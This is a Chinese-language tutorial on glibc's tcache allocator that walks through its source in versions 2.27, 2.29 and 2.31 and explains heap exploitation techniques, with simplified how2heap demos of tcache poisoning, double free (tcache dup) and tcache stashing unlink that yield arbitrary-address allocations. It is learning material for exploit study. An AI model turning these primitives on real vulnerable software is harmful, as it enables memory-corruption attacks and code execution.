0x01 什么是tcache
tcache全名thread local caching,它为每个线程创建一个缓存(cache),从而实现无锁的分配算法,有不错的性能提升。性能提升的代价就是安全检测的减少。下面先以glibc2.27进行分析,最后再补充glibc2.29和glibc2.31的改进。
1.1数据结构
glibc新增了两个结构体tcache_entry和tcache_perthread_struct来管理tcache。tcache_entry只包含一个成员next,指向同一条链表中的下一个tcache_entry。tcache_perthread_struct中,counts[i]记录第i条链表中chunk的数量,entries[i]是第i条链表的表头指针。每条tcache_entry链表默认最多包含7个chunk。
/* We overlay this structure on the user-data portion of a chunk when
the chunk is stored in the per-thread cache.
In this version the entry holds nothing but the list link. */
typedef struct tcache_entry
{
/* Next entry in the same bin's singly linked list. */
struct tcache_entry *next;
} tcache_entry;
/* There is one of these for each thread, which contains the
per-thread cache (hence "tcache_perthread_struct"). Keeping
overall size low is mildly important. Note that COUNTS and ENTRIES
are redundant (we could have just counted the linked list each
time), this is for performance reasons. */
typedef struct tcache_perthread_struct
{
/* counts[i]: number of entries currently linked in bin i. */
char counts[TCACHE_MAX_BINS];
/* entries[i]: head of the singly linked list for bin i. */
tcache_entry *entries[TCACHE_MAX_BINS];
} tcache_perthread_struct;
tcache有两个重要函数:tcache_put()用于将chunk放入对应的链表,tcache_get()用于从对应的链表中取出chunk。两者都只对tc_idx做了最简单的检查:判断其是否小于TCACHE_MAX_BINS(默认是64)。
/* Push CHUNK onto the head of tcache bin TC_IDX.
Caller must ensure that we know tc_idx is valid and there's room
for more chunks.
The only check made here is the bound on tc_idx; nothing verifies
whether the chunk is already linked in the bin. */
static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
/* The entry is overlaid on the chunk's user-data area. */
tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
assert (tc_idx < TCACHE_MAX_BINS);
/* Insert at the head: the new entry points at the old head. */
e->next = tcache->entries[tc_idx];
tcache->entries[tc_idx] = e;
++(tcache->counts[tc_idx]);
}
/* Pop and return the head entry of tcache bin TC_IDX.
Caller must ensure that we know tc_idx is valid and there's
available chunks to remove.
The asserts test the index bound and that the head pointer is
non-zero; the value read from e->next is not validated before it
becomes the new head. */
static __always_inline void *
tcache_get (size_t tc_idx)
{
tcache_entry *e = tcache->entries[tc_idx];
assert (tc_idx < TCACHE_MAX_BINS);
assert (tcache->entries[tc_idx] > 0);
/* Unlink the head; whatever e->next holds becomes the next result. */
tcache->entries[tc_idx] = e->next;
--(tcache->counts[tc_idx]);
return (void *) e;
}
tcache结构小结
- tcache结构的核心是tcache_perthread_struct记录了tcache的数量和tcache_entry链表。每次使用tcache之前会先在堆块中分配该结构体的空间。
- TCACHE_MAX_BINS的默认大小为64,即有64条单链表。最小的tcache chunk为0x20,最大为0x410。malloc申请时最大可申请0x408大小的tcache chunk。
- 每个tcache_entry链表最多包含7个chunk。
- 如果malloc时对应的tcache链表中存在空闲chunk,会优先从tcache返回,用完之后才会使用fastbin
- 如果free时tcache_entry存在空位会优先填满tcache,再放入fastbin或者unsortedbin当中。
1.2 tcache的使用
通过搜索tcache_get和tcache_put函数的引用来分析,tcache什么时候会被使用。tcache_get有4处,第一个为定义,总共3个地方使用了。tcache_put有5处,第一个为定义,总共4个地方使用。
tcache_get
第1处 __libc_malloc
在 __libc_malloc中对申请大小对应的tcache chunk进行判断,如果存在对应空闲tcache chunk则直接进行分配,没有则进入_int_malloc进行分配
void *
__libc_malloc (size_t bytes)
{
mstate ar_ptr;
void *victim;
void *(*hook) (size_t, const void *)
= atomic_forced_read (__malloc_hook);
if (__builtin_expect (hook != NULL, 0))
return (*hook)(bytes, RETURN_ADDRESS (0));
#if USE_TCACHE
/* int_free also calls request2size, be careful to not pad twice. */
size_t tbytes;
checked_request2size (bytes, tbytes);
size_t tc_idx = csize2tidx (tbytes);
MAYBE_INIT_TCACHE ();
DIAG_PUSH_NEEDS_COMMENT;
//判断tc_idx是否在tcache范围内
//tcache是否存在
//tc_idx对应的链表是否存在节点
if (tc_idx < mp_.tcache_bins
/*&& tc_idx < TCACHE_MAX_BINS*/ /* to appease gcc */
&& tcache
&& tcache->entries[tc_idx] != NULL)
{
return tcache_get (tc_idx);
}
DIAG_POP_NEEDS_COMMENT;
#endif
第2,3处 _int_malloc
在_int_malloc:3729处,for循环处理unsorted bin链表时,如果遇到大小恰好等于申请大小的chunk,会先将其放入tcache并将return_cached置1。之后当处理过的chunk数量超过mp_.tcache_unsorted_limit,或者循环结束时return_cached为1,就会直接调用tcache_get并返回。
#if USE_TCACHE
/* If we've processed as many chunks as we're allowed while
filling the cache, return one of the cached ones. */
++tcache_unsorted_count;
if (return_cached
&& mp_.tcache_unsorted_limit > 0
&& tcache_unsorted_count > mp_.tcache_unsorted_limit)
{
return tcache_get (tc_idx);
}
#endif
#define MAX_ITERS 10000
if (++iters >= MAX_ITERS)
break;
}
#if USE_TCACHE
/* If all the small chunks we found ended up cached, return one now. */
if (return_cached)
{
return tcache_get (tc_idx);
}
#endif
tcache_put
第一处_int_free
如果释放chunk对应的tcache存在空间,则直接将chunk放入tcache中。
#if USE_TCACHE
{
size_t tc_idx = csize2tidx (size);
if (tcache
&& tc_idx < mp_.tcache_bins
&& tcache->counts[tc_idx] < mp_.tcache_count)
{
tcache_put (p, tc_idx);
return;
}
}
#endif
在_int_malloc中存在好多处tcache_put,将fastbin和smallbin中的bin放入tcache中
第二处_int_malloc:3620:fastbin
能执行到这,说明原来的对应tcache中并没有可用bin。将第一个取到的chunk返回,并循环将fastbin中的bin放入tcache
/* While bin not empty and tcache not full, copy chunks. */
while (tcache->counts[tc_idx] < mp_.tcache_count
&& (tc_victim = *fb) != NULL)
{
if (SINGLE_THREAD_P)
*fb = tc_victim->fd;
else
{
REMOVE_FB (fb, pp, tc_victim);
if (__glibc_unlikely (tc_victim == NULL))
break;
}
tcache_put (tc_victim, tc_idx);
}
第三处_int_malloc:3677:smallbin
类似第二处。将第一个取到的chunk返回,并将smallbin中剩下的chunk放入tcache
if (in_smallbin_range (nb))
{
idx = smallbin_index (nb);
bin = bin_at (av, idx);
if ((victim = last (bin)) != bin)
{
bck = victim->bk;
if (__glibc_unlikely (bck->fd != victim))
malloc_printerr ("malloc(): smallbin double linked list corrupted");
set_inuse_bit_at_offset (victim, nb);
bin->bk = bck;
bck->fd = bin;
if (av != &main_arena)
set_non_main_arena (victim);
check_malloced_chunk (av, victim, nb);
#if USE_TCACHE
/* While we're here, if we see other chunks of the same size,
stash them in the tcache. */
size_t tc_idx = csize2tidx (nb);
if (tcache && tc_idx < mp_.tcache_bins)
{
mchunkptr tc_victim;
/* While bin not empty and tcache not full, copy chunks over. */
while (tcache->counts[tc_idx] < mp_.tcache_count
&& (tc_victim = last (bin)) != bin)
{
if (tc_victim != 0)
{
bck = tc_victim->bk;
set_inuse_bit_at_offset (tc_victim, nb);
if (av != &main_arena)
set_non_main_arena (tc_victim);
bin->bk = bck;
bck->fd = bin;
tcache_put (tc_victim, tc_idx);
}
}
}
#endif
void *p = chunk2mem (victim);
alloc_perturb (p, bytes);
return p;
}
}
第四处_int_malloc:3794
当tcache,fastbin,smallbin中都没有需要的chunk,则会进入大的for循环处理unsortedbin。当取出的unsortedbin大小(size)和申请的大小(nb)相同时,会将chunk放入tcache中并设置return_cached置为1。
if (size == nb)//申请大小和unsorted取的大小相同时
{
set_inuse_bit_at_offset (victim, size);
if (av != &main_arena)
set_non_main_arena (victim);
#if USE_TCACHE
/* Fill cache first, return to user only if cache fills.
We may return one of these chunks later. *///如果是tcache先放入tcache中,再取出
if (tcache_nb
&& tcache->counts[tc_idx] < mp_.tcache_count)
{
tcache_put (victim, tc_idx);
return_cached = 1;
continue;
}
else
{
#endif
check_malloced_chunk (av, victim, nb);
void *p = chunk2mem (victim);
alloc_perturb (p, bytes);
return p;
#if USE_TCACHE
}
#endif
}
0x02 tcache各种漏洞利用方式
2.1 tcache poisoning
原理:通过覆盖 tcache 中的 next,实现任意地址malloc。
下面是how2heap中tcache_poisoning.c简化版,通过修改chunk_b的next为栈地址stack_var,两次分配后得到栈地址。
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
/* Simplified tcache poisoning demo: overwrite the `next` link of a
freed chunk so that a later malloc returns an attacker-chosen address.
The write through `b` after free(b) is a deliberate use-after-free.
The outcome described below assumes the glibc 2.27 tcache behaviour. */
int main()
{
// disable buffering
setbuf(stdin, NULL);
setbuf(stdout, NULL);
// Target: its address is what the final malloc is expected to return.
size_t stack_var;
intptr_t *a = malloc(128);
intptr_t *b = malloc(128);
// Both chunks enter the same tcache bin; b becomes the head, b->next == a.
free(a);
free(b);
// Overwrite chunk b's `next` (first word of its user data) with a stack address.
b[0] = (intptr_t)&stack_var;
// First allocation pops b and makes the forged `next` the new bin head.
intptr_t *c = malloc(128);
// Second allocation returns the stack address (result intentionally unused).
malloc(128);
return 0;
}
2.2 tcache dup
类似 fastbin dup。但是在tcache_put时,没有进行检查。
/* Push CHUNK onto the head of tcache bin TC_IDX.
Caller must ensure that we know tc_idx is valid and there's room
for more chunks.
Nothing here checks whether the chunk is already in the bin, so
putting the same chunk twice leaves it linked to itself. */
static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
assert (tc_idx < TCACHE_MAX_BINS);
/* On a second put of the current head, e->next is set to e itself. */
e->next = tcache->entries[tc_idx];
tcache->entries[tc_idx] = e;
++(tcache->counts[tc_idx]);
}
下面代码是how2heap中的tcache_dup.c,连续两次free chunk_a。之后连续申请可以申请到同一个chunk_a。
#include <stdio.h>
#include <stdlib.h>
/* tcache dup demo: free the same chunk twice, then allocate twice and
get the same pointer back both times.
The double free is deliberate. It goes unnoticed only with a
tcache_put that performs no duplicate check (the glibc 2.27 version);
the key-based test in the 2.29 _int_free reports
"free(): double free detected in tcache 2" instead. */
int main()
{
int *a = malloc(8);
free(a);
// Deliberate double free: the chunk is now linked to itself in its bin.
free(a);
// Both allocations pop the same entry from the bin.
void *b = malloc(8);
void *c = malloc(8);
printf("Next allocated buffers will be same: [ %p, %p ].\n", b, c);
return 0;
}
2.3 tcache perthread corruption
tcache_perthread_struct 管理 tcache 的结构,如果能控制这个结构体,就能随意控制malloc到任意地址。且一般tcache_perthread_struct结构体也是使用malloc来创建,在heap的最前面。
常见的利用思路:
1.修改counts数组,将对应的值设为不小于7(即每条链表的上限mp_.tcache_count),此后free对应大小的chunk时将不会再进入tcache,方便泄露libc_base
2.修改entry数组,可以达到任意地址malloc的目的
2.4 tcache house of spirit
在栈上伪造fake_chunk,free(fake_chunk)将会使fake_chunk进入tcache
2.5 smallbin unlink
当smallbin中还有其他bin时,会将剩下的bin放入tcache中,会进入上文第三处_int_malloc:3677:smallbin分支,会出现unlink操作,但是缺少了unlink检查,可以使用unlink攻击。
2.6 tcache stashing unlink attack
1.当tcache_bin中有空闲的堆块
2.small_bin中有对应的堆块
3.调用calloc(calloc函数会调用_int_malloc),不会从tcache_bin中取得bin,而是会进入上文第三处_int_malloc:3677:smallbin,将堆块放入tcache中,由于缺少了检查
4.如果可以控制small_bin中的bk为一个writeable_addr,(其中bck就是writeable_addr)则可在writeable_addr+0x10写入一个libc地址。
下面是简化版的how2heap
1.构造漏洞环境,tcache_bin中5个bin,small_bin中两个bin
2.修改chunk2->bk=stack_var,设置fake_chunk->bk,stack_var[3] = &stack_var[2]
3.calloc触发进入目标分支,small_bin按照bk进行遍历,会先取到chunk0用于返回,然后进入while循环将small_bin中剩余的chunk放入tcache中:先取得chunk2,再取到stack_var放入tcache中,最后一次执行bck->fd = bin会在stack_var[4]中写入libc中的地址
4.再次申请,分配到栈上的fake_chunk。
#include <stdio.h>
#include <stdlib.h>
/* Simplified tcache stashing unlink demo.
Setup: 5 entries in the 0xa0 tcache bin and 2 chunks (chunk0, chunk2)
in the matching small bin. chunk2's bk is then redirected to a fake
chunk on the stack, and calloc drives the small-bin stashing loop in
_int_malloc so that the fake chunk ends up in the tcache.
The write into the freed chunk2 is a deliberate use-after-free.
NOTE(review): field offsets assume a 64-bit chunk layout (fd at
user+0, bk at user+8) — confirm for the target platform. */
int main(){
unsigned long stack_var[0x10] = {0};
unsigned long *chunk_lis[0x10] = {0};
unsigned long *target;
// Set the fake chunk's bk (stack_var[3]); if left 0, bck would be NULL
// and the later bck->fd write would fault.
stack_var[3] = (unsigned long)(&stack_var[2]);
//now we malloc 9 chunks
for(int i = 0;i < 9;i++){
chunk_lis[i] = (unsigned long*)malloc(0x90);
}
// Free chunks 3..8: six entries go into the tcache bin.
for(int i = 3;i < 9;i++){
free(chunk_lis[i]);
}
// Seventh and last tcache entry; the bin is now full.
// Presumably chunk1 is chosen so chunk0 and chunk2 are not adjacent free chunks.
free(chunk_lis[1]);
//now they are put into unsorted bin
// chunk0
free(chunk_lis[0]);
// chunk2
free(chunk_lis[2]);
//convert into small bin
// A request larger than 0x90 cannot be served by these chunks, so the
// unsorted-bin scan sorts chunk0 and chunk2 into the small bin.
malloc(0xa0);
// Take two entries out of the tcache bin, leaving 5.
malloc(0x90);
malloc(0x90);
// State now: 5 entries in the tcache bin, 2 chunks in the small bin.
// small_bin.bk --> chunk0.bk --> chunk2.bk --> stack_var (after the write below)
// small_bin.fd --> chunk2.fd --> chunk0
/*VULNERABILITY*/
// Overwrite chunk2->bk with the address of the fake chunk.
chunk_lis[2][1] = (unsigned long)stack_var;
/*VULNERABILITY*/
// Per the article, calloc does not take from the tcache: it returns chunk0
// from the small bin, then stashes chunk2 and the fake chunk into the tcache.
calloc(1,0x90);
//malloc and return our fake chunk on stack
target = malloc(0x90);
return 0;
}
0x03 glibc2.29的更新
3.1 结构体改变
1.tcache_entry新增key成员(tcache_perthread_struct结构体地址)用于防止double free
/* Per-chunk tcache list node, with a `key` field next to the list link. */
typedef struct tcache_entry
{
/* Next entry in the same bin's singly linked list. */
struct tcache_entry *next;
/* This field exists to detect double frees. */
struct tcache_perthread_struct *key;
} tcache_entry;
/* Per-thread cache state: one counter and one list head per bin. */
typedef struct tcache_perthread_struct
{
/* counts[i]: number of entries currently linked in bin i. */
char counts[TCACHE_MAX_BINS];
/* entries[i]: head of the singly linked list for bin i. */
tcache_entry *entries[TCACHE_MAX_BINS];
} tcache_perthread_struct;
3.2 tcache_get和tcache_put的改变
新增的改变都是围绕key进行
1.在调用tcache_put函数时设置key成员为tcache。
2.在调用tcache_get函数时设置key成员为null。
/* Push CHUNK onto the head of tcache bin TC_IDX and stamp its key
field with the tcache pointer. */
static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
assert (tc_idx < TCACHE_MAX_BINS);
/* Mark this chunk as "in the tcache" so the test in _int_free will
detect a double free. */
e->key = tcache;
/* Insert at the head: the new entry points at the old head. */
e->next = tcache->entries[tc_idx];
tcache->entries[tc_idx] = e;
++(tcache->counts[tc_idx]);
}
/* Pop and return the head entry of tcache bin TC_IDX, clearing its
key field so the chunk no longer looks like it is in the tcache. */
static __always_inline void *
tcache_get (size_t tc_idx)
{
tcache_entry *e = tcache->entries[tc_idx];
assert (tc_idx < TCACHE_MAX_BINS);
assert (tcache->entries[tc_idx] > 0);
/* Unlink the head; e->next becomes the new head without validation. */
tcache->entries[tc_idx] = e->next;
--(tcache->counts[tc_idx]);
/* Reset the double-free marker before handing the memory out. */
e->key = NULL;
return (void *) e;
}
3.3 对tcache_put新增的检测
只有 **_int_free** 在将chunk放入tcache之前新增了检测:判断chunk的key值是否等于tcache,以防止double free。此后要进行double free,需要先修改key值才能进行
#if USE_TCACHE
{
size_t tc_idx = csize2tidx (size);
if (tcache != NULL && tc_idx < mp_.tcache_bins)
{
/* Check to see if it's already in the tcache. */
tcache_entry *e = (tcache_entry *) chunk2mem (p);
/* This test succeeds on double free. However, we don't 100%
trust it (it also matches random payload data at a 1 in
2^<size_t> chance), so verify it's not an unlikely
coincidence before aborting. */
if (__glibc_unlikely (e->key == tcache))
{
tcache_entry *tmp;
LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
for (tmp = tcache->entries[tc_idx];
tmp;
tmp = tmp->next)
if (tmp == e)
malloc_printerr ("free(): double free detected in tcache 2");
/* If we get here, it was a coincidence. We've wasted a
few cycles, but don't abort. */
}
if (tcache->counts[tc_idx] < mp_.tcache_count)
{
tcache_put (p, tc_idx);
return;
}
}
}
#endif
0x04 glibc2.31的更新
4.1 结构体改变
tcache_perthread_struct结构体count数组由原来的char改成了uint16_t,结构体大小发生了改变由原来的0x240变成0x280。
/* Per-thread cache state: one counter and one list head per bin.
In this version each counter is a uint16_t. */
typedef struct tcache_perthread_struct
{
/* counts[i]: number of entries currently linked in bin i. */
uint16_t counts[TCACHE_MAX_BINS];
/* entries[i]: head of the singly linked list for bin i. */
tcache_entry *entries[TCACHE_MAX_BINS];
} tcache_perthread_struct;
4.2 tcache_get和tcache_put改变
原本的assert检查从tcache_get和tcache_put中移除,由调用者确保函数调用的安全。
/* Push CHUNK onto the head of tcache bin TC_IDX.
Caller must ensure that we know tc_idx is valid and there's room
for more chunks.
This version contains no assert; tc_idx is used as given. */
static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
/* Mark this chunk as "in the tcache" so the test in _int_free will
detect a double free. */
e->key = tcache;
/* Insert at the head: the new entry points at the old head. */
e->next = tcache->entries[tc_idx];
tcache->entries[tc_idx] = e;
++(tcache->counts[tc_idx]);
}
/* Pop and return the head entry of tcache bin TC_IDX.
Caller must ensure that we know tc_idx is valid and there's
available chunks to remove.
This version contains no assert; an empty bin or bad index is not
caught here. */
static __always_inline void *
tcache_get (size_t tc_idx)
{
tcache_entry *e = tcache->entries[tc_idx];
/* Unlink the head; e->next becomes the new head without validation. */
tcache->entries[tc_idx] = e->next;
--(tcache->counts[tc_idx]);
/* Reset the double-free marker before handing the memory out. */
e->key = NULL;
return (void *) e;
}
0x05 总结
总体来说利用方式比之前更简单。
参考链接
ctfwiki